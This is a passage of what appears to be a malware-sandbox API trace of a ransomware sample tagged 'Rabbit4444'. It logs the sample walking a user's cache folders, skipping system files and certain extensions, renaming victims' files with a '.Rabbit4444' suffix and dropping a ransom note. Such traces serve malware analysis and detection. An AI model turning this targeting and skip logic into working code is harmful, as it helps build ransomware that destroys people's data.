lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.719] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.719] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.719] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xda90ec4a, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.719] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.719] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.719] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.719] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.719] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.719] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeb3e56d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeb3e56d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeb3e56d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.719] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.719] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.719] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8890d676, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x8890d676, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x88b23828, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x52b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nexus.json", cAlternateFileName="NEXUS~1.JSO")) returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="Rabbit4444.exe") returned -1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2=".") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="..") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="windows") returned -1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="bootmgr") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="pagefile.sys") returned -1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="boot") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="ids.txt") returned 1 [0062.719] lstrcmpiW (lpString1="Nexus.json", lpString2="NTUSER.DAT") returned -1 [0062.720] lstrcpyW (in: lpString1=0x130ebe6, lpString2="Nexus.json" | out: lpString1="Nexus.json") returned="Nexus.json" [0062.720] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\Nexus.json", dwFileAttributes=0x0) returned 1 [0062.721] lstrlenW (lpString="Nexus.json") returned 10 [0062.721] lstrlenW (lpString="Rabbit4444") returned 10 [0062.721] lstrcmpiW (lpString1="Nexus.json", lpString2="Rabbit4444") returned -1 [0062.721] lstrlenW (lpString=".dll") returned 4 [0062.721] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0062.721] lstrlenW (lpString=".lnk") returned 4 [0062.721] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0062.721] lstrlenW (lpString=".ini") returned 4 [0062.721] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0062.721] lstrlenW (lpString=".sys") returned 4 [0062.721] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0062.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\Nexus.json" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\nexus.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0062.721] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.721] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15403203699) returned 1 [0062.721] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=21172) returned 1 [0062.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0062.721] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0062.721] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x55c0, lpName=0x0) returned 0x2a0 [0062.724] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x55c0) returned 0x70000 [0062.728] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x122f98 [0062.728] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0062.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.728] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0062.728] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x122f98 [0062.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0062.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0062.728] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15403915708) returned 1 [0062.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0062.728] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0062.729] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.729] CloseHandle (hObject=0x2a0) returned 1 [0062.729] CloseHandle (hObject=0x260) returned 1 [0062.729] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\Nexus.json.Rabbit4444") returned 108 [0062.729] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\Nexus.json" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\nexus.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\Nexus.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\nexus.json.rabbit4444"), dwFlags=0x1) returned 1 [0062.730] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda90ec4a, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xda90ec4a, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xe1510392, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="perUserCache_0", cAlternateFileName="PERUSE~1")) returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="Rabbit4444.exe") returned -1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2=".") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="..") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="windows") returned -1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="bootmgr") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="pagefile.sys") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="boot") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="ids.txt") returned 1 [0062.730] lstrcmpiW (lpString1="perUserCache_0", lpString2="NTUSER.DAT") returned 1 [0062.730] lstrcpyW (in: lpString1=0x130ebe6, lpString2="perUserCache_0" | out: lpString1="perUserCache_0") returned="perUserCache_0" [0062.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0062.730] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108688 [0062.730] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122048 [0062.730] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda90ec4a, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xda90ec4a, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xe1510392, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="perUserCache_0", cAlternateFileName="PERUSE~1")) returned 0 [0062.730] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0062.730] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.730] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.731] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0062.731] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.732] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.732] CloseHandle (hObject=0x260) returned 1 [0062.732] CloseHandle (hObject=0x298) returned 1 [0062.732] GetCurrentThreadId () returned 0xd98 [0062.732] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0062.732] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0" [0062.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0062.732] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0062.732] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0" [0062.732] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\" [0062.732] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\.BFC0E91B00AE8A0620D3" [0062.732] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.777] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.780] FlushFileBuffers (hFile=0x298) returned 1 [0062.781] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.781] CloseHandle (hObject=0x298) returned 1 [0062.781] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0") returned 101 [0062.781] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.781] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda90ec4a, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xe1510392, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeebd71de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0062.782] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.782] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.782] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.782] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.782] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda90ec4a, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xe1510392, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xeebd71de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.782] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.782] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.782] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.782] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.782] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.782] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeebd71de, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeebd71de, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeebd71de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.782] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.782] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.782] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc478053, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xdc478053, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xdc5108ea, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x1183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1bae5997-e878-4247-b7f8-d49affc6cff5", cAlternateFileName="1BAE59~1")) returned 1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="Rabbit4444.exe") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2=".") returned 1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="..") returned 1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="windows") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="bootmgr") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="pagefile.sys") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="boot") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="ids.txt") returned -1 [0062.782] lstrcmpiW (lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5", lpString2="NTUSER.DAT") returned -1 [0062.782] lstrcpyW (in: lpString1=0x130ec04, lpString2="1bae5997-e878-4247-b7f8-d49affc6cff5" | out: lpString1="1bae5997-e878-4247-b7f8-d49affc6cff5") returned="1bae5997-e878-4247-b7f8-d49affc6cff5" [0062.782] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5", dwFileAttributes=0x0) returned 1 [0062.784] lstrlenW (lpString="1bae5997-e878-4247-b7f8-d49affc6cff5") returned 36 [0062.784] lstrlenW (lpString="Rabbit4444") returned 10 [0062.784] lstrcmpiW (lpString1="9affc6cff5", lpString2="Rabbit4444") returned -1 [0062.784] lstrlenW (lpString=".dll") returned 4 [0062.784] lstrcmpiW (lpString1="cff5", lpString2=".dll") returned 1 [0062.784] lstrlenW (lpString=".lnk") returned 4 [0062.784] lstrcmpiW (lpString1="cff5", lpString2=".lnk") returned 1 [0062.784] lstrlenW (lpString=".ini") returned 4 [0062.784] lstrcmpiW (lpString1="cff5", lpString2=".ini") returned 1 [0062.784] lstrlenW (lpString=".sys") returned 4 [0062.784] lstrcmpiW (lpString1="cff5", lpString2=".sys") returned 1 [0062.784] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0062.785] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.785] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15409555352) returned 1 [0062.785] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4483) returned 1 [0062.785] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0062.785] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0062.785] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1490, lpName=0x0) returned 0x29c [0062.786] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1490) returned 0x80000 [0062.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x122f98 [0062.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0062.788] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0062.788] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x122f98 [0062.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0062.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122f98 | out: hHeap=0xe0000) returned 1 [0062.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0062.789] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15409943784) returned 1 [0062.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0062.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0062.789] UnmapViewOfFile (lpBaseAddress=0x80000) returned 1 [0062.789] CloseHandle (hObject=0x29c) returned 1 [0062.789] CloseHandle (hObject=0x2a0) returned 1 [0062.789] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5.Rabbit4444") returned 149 [0062.789] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\LocalCache\\perUserCache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\localcache\\perusercache_0\\1bae5997-e878-4247-b7f8-d49affc6cff5.rabbit4444"), dwFlags=0x1) returned 1 [0062.790] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0cb888e, ftCreationTime.dwHighDateTime=0x1d336df, ftLastAccessTime.dwLowDateTime=0xe0cb888e, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xe0d2af1c, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x2b694, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1bec6d4a-6687-4295-b59f-5b3c048ab97c", cAlternateFileName="1BEC6D~1")) returned 1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="Rabbit4444.exe") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2=".") returned 1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="..") returned 1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="windows") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="bootmgr") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", lpString2="pagefile.sys") returned -1 [0062.790] lstrcmpiW (lpString1="1bec6d4a-6687-4295-b59f-5b3c048ab97c", 